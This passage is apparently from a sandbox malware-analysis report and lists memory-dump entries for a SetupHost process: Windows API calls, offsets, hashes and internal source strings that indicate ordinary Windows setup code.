                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Free$AllocControlDeviceErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1143500657-0
                                                                                                                        • Opcode ID: 432127ac4592348846ffb07003f9e8947d0163a54e4e62a4ec5c2fdedce273d0
                                                                                                                        • Instruction ID: 88afe977d958392ea80e1bb758f50e8051bec615b02169832034ae81d9b82355
                                                                                                                        • Opcode Fuzzy Hash: 432127ac4592348846ffb07003f9e8947d0163a54e4e62a4ec5c2fdedce273d0
                                                                                                                        • Instruction Fuzzy Hash: D0519A75604305DFDF288F68E849B76BFB9FB55711F148469E8058B251E2B1EC80CBA2
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 004FA259
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 004FA260
                                                                                                                        • memcpy.MSVCRT(00000000,?,?,?,?,?), ref: 004FA285
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 004FA2AE
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 004FA2D6
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?), ref: 004FA2DD
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 004FA308
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?), ref: 004FA30F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess$AllocLibrarymemcpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2631027701-0
                                                                                                                        • Opcode ID: 7d13b432ffe6f0ba3649bc7b0bd02882b5d6ca7e55c9c911b51fe507de6aee1b
                                                                                                                        • Instruction ID: bafd3e3a8aba7cf87d977e5416d00a0f874513ab652f5761d2d1b89d214b7647
                                                                                                                        • Opcode Fuzzy Hash: 7d13b432ffe6f0ba3649bc7b0bd02882b5d6ca7e55c9c911b51fe507de6aee1b
                                                                                                                        • Instruction Fuzzy Hash: 0F41E4B5E0020EABCB019FA5C88467EF7B4BF98301F1180AAE619D3340C7399915CB56
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000008,?,?,00000000,0052D737,?,?,00000000,?,?,0052D6AA,?,0052D0B0,0052CFA0,Function_0006CEF0), ref: 00520285
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,0052D6AA,?,0052D0B0,0052CFA0,Function_0006CEF0,00000000,00000000,?,00526A3B,?,?,?,?,00000000), ref: 0052028C
                                                                                                                        • GetLastError.KERNEL32(?,0052D6AA,?,0052D0B0,0052CFA0,Function_0006CEF0,00000000,00000000,?,00526A3B,?,?,?,?,00000000,00000000), ref: 00520298
                                                                                                                        • GetLastError.KERNEL32(?,0052D6AA,?,0052D0B0,0052CFA0,Function_0006CEF0,00000000,00000000,?,00526A3B,?,?,?,?,00000000,00000000), ref: 005202B0
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,0052D6AA,?,0052D0B0,0052CFA0,Function_0006CEF0,00000000,00000000,?,00526A3B,?,?,?,?), ref: 005202D9
                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,0052D6AA,?,0052D0B0,0052CFA0,Function_0006CEF0,00000000,00000000,?,00526A3B,?,?,?,?,00000000), ref: 005202E3
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,0052D6AA,?,0052D0B0,0052CFA0,Function_0006CEF0,00000000,00000000,?,00526A3B,?,?,?,?,00000000), ref: 005202F3
                                                                                                                        • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,0052D6AA,?,0052D0B0,0052CFA0,Function_0006CEF0,00000000,00000000,?,00526A3B,?), ref: 00520306
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalErrorHeapLastSection$AllocEnterLeaveObjectProcessReleaseSemaphoreSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 549668083-0
                                                                                                                        • Opcode ID: cce4965f75327a422c7eb816d1ed55aabf3cf9affaf240c92e7f4ed4e0fd96d2
                                                                                                                        • Instruction ID: 92f0fe0e764e8ff223844a29e16107a95d56bea09fd270a9a664e4b301889d19
                                                                                                                        • Opcode Fuzzy Hash: cce4965f75327a422c7eb816d1ed55aabf3cf9affaf240c92e7f4ed4e0fd96d2
                                                                                                                        • Instruction Fuzzy Hash: 8E11C279216321DBDB119F64FC4CB667EA4FF69312F118055F905DA1E6C770C844DB60
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(000000DF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00521284), ref: 0052109A
                                                                                                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00000000,?), ref: 005210E6
                                                                                                                        • DeviceIoControl.KERNEL32(?,000980C8,?,00000010,00000000,00000000,?,00521284), ref: 00521140
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00521284,?), ref: 0052114C
                                                                                                                        • GetOverlappedResult.KERNEL32(?,00521284,?,00000001), ref: 00521165
                                                                                                                        • SetFileInformationByHandle.KERNEL32(?,00000006,?,00000008), ref: 00521195
                                                                                                                        • SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001), ref: 005211AC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$ErrorLastPointer$ControlDeviceHandleInformationOverlappedResult
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3873607931-0
                                                                                                                        • Opcode ID: d99a4ecd6b43dbd878020a5aa9b71716e823eb4a5058657ea9c6ec6fb10e3d74
                                                                                                                        • Instruction ID: 91662351747d9bac21050c30e573da794a1feef4ef5e55a7b01e4e30aff9fc87
                                                                                                                        • Opcode Fuzzy Hash: d99a4ecd6b43dbd878020a5aa9b71716e823eb4a5058657ea9c6ec6fb10e3d74
                                                                                                                        • Instruction Fuzzy Hash: 9A415C71A01619ABDB10CF64EC85BAFBBF9FFA9710F114429E905E7280DB70AD40CB64
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 005255C6: CreateFileW.KERNEL32(00000000,C0000000,00000007,00000000,00000002,-080000FF,00000000,?,00000008,00000000,00528CDB,00528CDB,?,005289FD,00000000), ref: 00525625
                                                                                                                          • Part of subcall function 0052A4C7: GetProcessHeap.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,?,00000000,?,?,0051DD7D,?,00000000,00000000,00000000), ref: 0052A51A
                                                                                                                          • Part of subcall function 0052A4C7: HeapAlloc.KERNEL32(00000000,?,?,0051DD7D,?,00000000,00000000,00000000,?,0051E028,?,00000000), ref: 0052A521
                                                                                                                          • Part of subcall function 0052A4C7: SetLastError.KERNEL32(00000000,000001D6,80070216,00000000,00000000,00000000,00000000,?,00000000,?,?,0051DD7D,?,00000000,00000000,00000000), ref: 0052A5BE
                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,00000000,?,00000000,?,?,0051DD7D,?,00000000,00000000,00000000), ref: 0052321A
                                                                                                                          • Part of subcall function 00526824: memset.MSVCRT ref: 00526875
                                                                                                                          • Part of subcall function 00526824: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0052691F
                                                                                                                        • GetLastError.KERNEL32(00000000,00000002,?,00000000,?,?,-00000030,?,?,?,?,?,?,?,00000000,00000000), ref: 0052326E
                                                                                                                          • Part of subcall function 00521984: SetLastError.KERNEL32(00000006,00000000,0051E32B,?,00000000), ref: 005219AC
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000,?,?,0051DD7D,?,00000000,00000000,00000000,?,0051E028,?,00000000), ref: 005232AC
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,0051DD7D,?,00000000,00000000,00000000,?,0051E028,?,00000000), ref: 005232B7
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,0051DD7D,?,00000000), ref: 005232C8
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,0051DD7D,?,00000000), ref: 005232CF
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,0051DD7D,?,00000000), ref: 005232DA
                                                                                                                          • Part of subcall function 0052A5C8: GetProcessHeap.KERNEL32(00000000,00000000,?,00523202,?,?,00000000,00000000,?,00000000,?,?,0051DD7D,?,00000000,00000000), ref: 0052A62E
                                                                                                                          • Part of subcall function 0052A5C8: HeapFree.KERNEL32(00000000,?,00523202,?,?,00000000,00000000,?,00000000,?,?,0051DD7D,?,00000000,00000000,00000000), ref: 0052A635
                                                                                                                          • Part of subcall function 0052A5C8: SetLastError.KERNEL32(00000000,?,00523202,?,?,00000000,00000000,?,00000000,?,?,0051DD7D,?,00000000,00000000,00000000), ref: 0052A640
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Heap$Process$FileFree$AllocCloseCreateHandleSizememset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 383526647-0
                                                                                                                        • Opcode ID: 66a4aee930ef573c7c0555ada56ccc1e0a80d431840989441658b239e4bca023
                                                                                                                        • Instruction ID: 3973cc148c02dfac75a250b1deef52db03c394c194ea9019e589804a0f06321b
                                                                                                                        • Opcode Fuzzy Hash: 66a4aee930ef573c7c0555ada56ccc1e0a80d431840989441658b239e4bca023
                                                                                                                        • Instruction Fuzzy Hash: C2410735B00726ABDB14ABB4A85EA7FBEB6BFD6311F004428F502932D1DF348E06C654
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000020,00000000,00000000,00000000,00000004,00000014,00000000,00000000,0051E93C,?,?,00000000,00000000), ref: 0050726F
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0051F26B), ref: 00507276
                                                                                                                          • Part of subcall function 00507DD3: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00507358,00000000), ref: 00507E22
                                                                                                                          • Part of subcall function 00507DD3: HeapFree.KERNEL32(00000000,?,?,00507358,00000000), ref: 00507E29
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFree
                                                                                                                        • String ID: NewContext.Allocate()$Not-null check failed: UpdateContext$SourceMicrodom != 0$Windows::uDom::Rtl::RtlCreateMicrodomUpdateContext$onecore\base\xml\udom_modify.cpp
                                                                                                                        • API String ID: 756756679-3807835623
                                                                                                                        • Opcode ID: c980b30da4676c84dab726089bdb727342ecb908b5a191072e0c6480edb1acb2
                                                                                                                        • Instruction ID: 1ca78617d5c7a4418afa724af76a8df75dce46091b0a1ee048b526e9cf9afceb
                                                                                                                        • Opcode Fuzzy Hash: c980b30da4676c84dab726089bdb727342ecb908b5a191072e0c6480edb1acb2
                                                                                                                        • Instruction Fuzzy Hash: E821CEB590C7169BC320DF58A40865FBFE4BBD8710F11492EF85987391D774DA088BA6
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00520329
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0052034A
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00520362
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00520369
                                                                                                                        • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 005203AB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalHeapSection$EnterFreeLeaveProcessReleaseSemaphore
                                                                                                                        • String ID: DequeueWimData
                                                                                                                        • API String ID: 3013838341-1001850157
                                                                                                                        • Opcode ID: 5b6043bf275f4e4ca3fa491da92ced6330fd4e46c2298b138381f368bbcbfda5
                                                                                                                        • Instruction ID: 521dbae0a61a262cfb357fd2c20b10044c8eec87781bb45fe3d2922593375aa2
                                                                                                                        • Opcode Fuzzy Hash: 5b6043bf275f4e4ca3fa491da92ced6330fd4e46c2298b138381f368bbcbfda5
                                                                                                                        • Instruction Fuzzy Hash: BF119D35600329ABCB10DFA5EC88B8ABFA8FF69711F008425B904D72E0D770DD00DBA0
                                                                                                                        APIs
                                                                                                                        • memcpy.MSVCRT(?,?,00000000,?,00000000,00000000,?,?,?,00000000,?), ref: 0051C368
                                                                                                                        Strings
                                                                                                                        • RtlAppendLBlobToLBlob, xrefs: 0051C2DF
                                                                                                                        • ::RtlIsLBlobValid(Destination), xrefs: 0051C304
                                                                                                                        • ::RtlIsLBlobValid(Source), xrefs: 0051C333
                                                                                                                        • Not-null check failed: Destination, xrefs: 0051C2C8
                                                                                                                        • Not-null check failed: Source, xrefs: 0051C318
                                                                                                                        • onecore\base\lstring\lblob.cpp, xrefs: 0051C2D8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: memcpy
                                                                                                                        • String ID: ::RtlIsLBlobValid(Destination)$::RtlIsLBlobValid(Source)$Not-null check failed: Destination$Not-null check failed: Source$RtlAppendLBlobToLBlob$onecore\base\lstring\lblob.cpp
                                                                                                                        • API String ID: 3510742995-2103971228
                                                                                                                        • Opcode ID: 87609780f36d28501a97a23a1652cf4b33cda7cf6288412d82d2f6d1303f0ca4
                                                                                                                        • Instruction ID: cbc0fd9198fb1bff10853696fe62ce2d2c60d6dc493e875b2fc655635a27d716
                                                                                                                        • Opcode Fuzzy Hash: 87609780f36d28501a97a23a1652cf4b33cda7cf6288412d82d2f6d1303f0ca4
                                                                                                                        • Instruction Fuzzy Hash: 8721AEB5A41209ABEF10EFC4C4489DEBFB5BF81308F25889AD8616B301D7758E849B95
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 005470A4
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005470B9
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 005470C0
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 005470D5
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005470E2
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005470E9
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005471BD
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005471C4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$ByteCharFreeMultiWide$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 741470664-0
                                                                                                                        • Opcode ID: 1147b48c888d5b42c260aef13c6df872d0505a4bf99a97f21e9c6728c840262e
                                                                                                                        • Instruction ID: 2f70a299602ed064a3281e8d8c20ed4c4cf402ee56d4949720b4f5a324bf991f
                                                                                                                        • Opcode Fuzzy Hash: 1147b48c888d5b42c260aef13c6df872d0505a4bf99a97f21e9c6728c840262e
                                                                                                                        • Instruction Fuzzy Hash: 2D41817590421A9FDB10DFA4DC48BAFBBB9FF48316F144165E815E7290EB709D44CB60
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2221118986-0
                                                                                                                        • Opcode ID: f5b6bf27eef4e303001baf7e9c274eedf36e6142ac1ebd5e8cc7fdb2670a1080
                                                                                                                        • Instruction ID: b4f5244b02f1aaa9296fb2ce75fa70d1c065e7852fa2558bc3e437c0c372a4a5
                                                                                                                        • Opcode Fuzzy Hash: f5b6bf27eef4e303001baf7e9c274eedf36e6142ac1ebd5e8cc7fdb2670a1080
                                                                                                                        • Instruction Fuzzy Hash: BE4184F2941B049EE324DE74C999FE7BBDCFB84310F40093EE65A5A182E774A944CA14
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,0051E0F4,?,00000000,00000000,0051E358,?,?,00000000), ref: 00527138
                                                                                                                        • HeapFree.KERNEL32(00000000,?,0051E0F4,?,00000000,00000000,0051E358,?,?,00000000), ref: 0052713F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0051E0F4,?,00000000,00000000,0051E358,?,?,00000000), ref: 00527168
                                                                                                                        • HeapFree.KERNEL32(00000000,?,0051E0F4,?,00000000,00000000,0051E358,?,?,00000000), ref: 0052716F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?,0051E0F4,?,00000000,00000000,0051E358,?,?,00000000), ref: 00527190
                                                                                                                        • HeapFree.KERNEL32(00000000,?,0051E0F4,?,00000000,00000000,0051E358,?,?,00000000), ref: 00527197
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?,0051E0F4,?,00000000,00000000,0051E358,?,?,00000000), ref: 005271A8
                                                                                                                        • HeapFree.KERNEL32(00000000,?,0051E0F4,?,00000000,00000000,0051E358,?,?,00000000), ref: 005271AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859560861-0
                                                                                                                        • Opcode ID: 3abf48e058deebf74e1af31f88751fdef87475108f13650a0219b687f02510a7
                                                                                                                        • Instruction ID: a050290fd69e0080f443a45c9ae594c46704cd25d5f36f4098432a789a83f9e4
                                                                                                                        • Opcode Fuzzy Hash: 3abf48e058deebf74e1af31f88751fdef87475108f13650a0219b687f02510a7
                                                                                                                        • Instruction Fuzzy Hash: 75218E71608329BBEB20DFA5EC58B2A7BACFF19752F10409CE80AD61D1D730D910CB20
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000030,00000002,?,00000000,00000000,?,?,000000FF,00000000,00000000,00000001), ref: 0052E463
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0052E46A
                                                                                                                        • memcpy.MSVCRT(0000002A,?,?), ref: 0052E4E0
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0052E532
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0052E539
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFreememcpy
                                                                                                                        • String ID: FltCommStubCreateChild
                                                                                                                        • API String ID: 3405790324-3059287848
                                                                                                                        • Opcode ID: eba345b42747bfa7e6fab0399ae7a048e2813f482cf425cb8f0de0252dc1d2d0
                                                                                                                        • Instruction ID: 7e135b896fa5781f58b9d591bcf93629b751cb39a134f11516e9c4f88de45cbb
                                                                                                                        • Opcode Fuzzy Hash: eba345b42747bfa7e6fab0399ae7a048e2813f482cf425cb8f0de0252dc1d2d0
                                                                                                                        • Instruction Fuzzy Hash: C0419675A00226AFCB10DF69D859A6BBFF4FF49310F10452AE919D7390E734A900CBD1
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0053F09D
                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,00000000,?,00000000,00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C,?), ref: 0053F0BA
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C,?,?,?), ref: 0053F0C1
                                                                                                                        • GetFileSize.KERNEL32(00000000,?,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C,?,?,?), ref: 0053F0E1
                                                                                                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,?,00000000,00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C), ref: 0053F0F8
                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C,?), ref: 0053F10B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
